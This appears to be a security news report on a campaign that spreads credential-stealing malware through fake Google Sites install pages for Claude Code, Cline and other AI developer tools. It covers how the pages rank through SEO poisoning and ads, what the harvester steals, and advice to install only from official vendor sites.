A campaign targeting AI developers has been distributing credential-stealing malware through fraudulent Google Sites pages impersonating Claude Code, Cline, JetBrains, Snowflake, Perplexity Comet, and other AI developer tools. Security researchers documented the operation as of this week, confirming 88 malicious domains and 32 active Google-hosted pages distributing malware to developers who search for installation instructions.
Why Attackers Chose Google Sites to Host Fake Claude Code and Cline Install Pages
The choice of sites.google.com as the attack platform is deliberate. Corporate firewalls, web proxies, and URL reputation services pre-allow Google-hosted domains by default — the same trust that makes Google Sites useful for legitimate teams makes it an effective evasion mechanism for attackers distributing malware. A malicious page hosted on sites.google.com passes the security controls that would block an unknown domain serving the same content.
The campaign has been active since March 2026. The scale as of the researcher disclosure — 88 malicious domains and 32 confirmed live Google Sites pages — reflects an operation with sustained maintenance, not a one-time distribution attempt.
SEO Poisoning and Paid Google Ads Place Fake Claude Code Pages Above Official Installation Docs
The campaign uses two traffic channels to reach developer targets. SEO poisoning manipulates search rankings so that fraudulent installation pages appear near the top of organic results for queries like “install Claude Code” or “Claude Code setup.” Separately, paid advertisements allow the malicious pages to appear as sponsored results above the official documentation.
A developer following standard practice — searching for how to install a tool and clicking what appears to be the top result — can land on a convincing fake page before reaching the official vendor site. The Google-hosted infrastructure reinforces the appearance of legitimacy.
How the Fake Claude Code Install Command Hides Its Malicious Payload in a Separator Character
The delivery mechanism exploits developer instinct to copy-paste install commands directly from documentation. The displayed command on the fraudulent page appears normal, but contains a hidden separator character positioned to trigger a malicious payload before the legitimate-looking portion executes. The developer copies what looks like an install command and runs it; the separator causes the terminal to execute the hidden portion first, silently.
The attack requires no browser exploit, no vulnerable software, and no additional user interaction. A developer following standard installation practice is the only prerequisite.
The 88-Domain Harvester Targets AI API Keys, 65+ Browsers, and Password Managers
The delivered malware is a purpose-built credential harvester covering the full AI developer toolchain. It targets AI API keys specifically — Claude, OpenAI, and Cline/Continue.dev credentials — alongside credentials from more than 65 browsers, cryptocurrency wallet browser extensions, password manager databases including KeePass, Bitwarden, and 1Password, and messaging platform data from Telegram, Discord, and Signal.
The breadth of the target list reflects a systematic approach: the malware collects everything an AI developer is likely to have stored, not just one credential class. Cryptocurrency wallet extensions and password managers are high-yield targets alongside the AI API keys.
What Stolen Claude and OpenAI API Keys Enable Beyond Account Access
AI API keys carry financial exposure that distinguishes them from standard account credentials. A stolen key can be used to run inference workloads billed directly to the victim’s account — generating charges that accumulate before the victim detects unauthorized use. API keys are also bound to the code repositories, model configurations, and proprietary data connected to the account; a stolen key may expose training data, application logic, or client-facing models depending on what the victim has associated with that API access.
Stolen AI API keys are actively traded on underground markets. The combination of financial damage, data exposure, and resale value makes AI developer credentials a high-priority target for a campaign willing to maintain 88 domains and dozens of Google Sites pages over several months.
Developers should access tool installation instructions by navigating directly to the official vendor domain, not by following search result links. Any install command obtained from a page reached through a search engine rather than the official documentation should be treated as suspect until the source is verified.
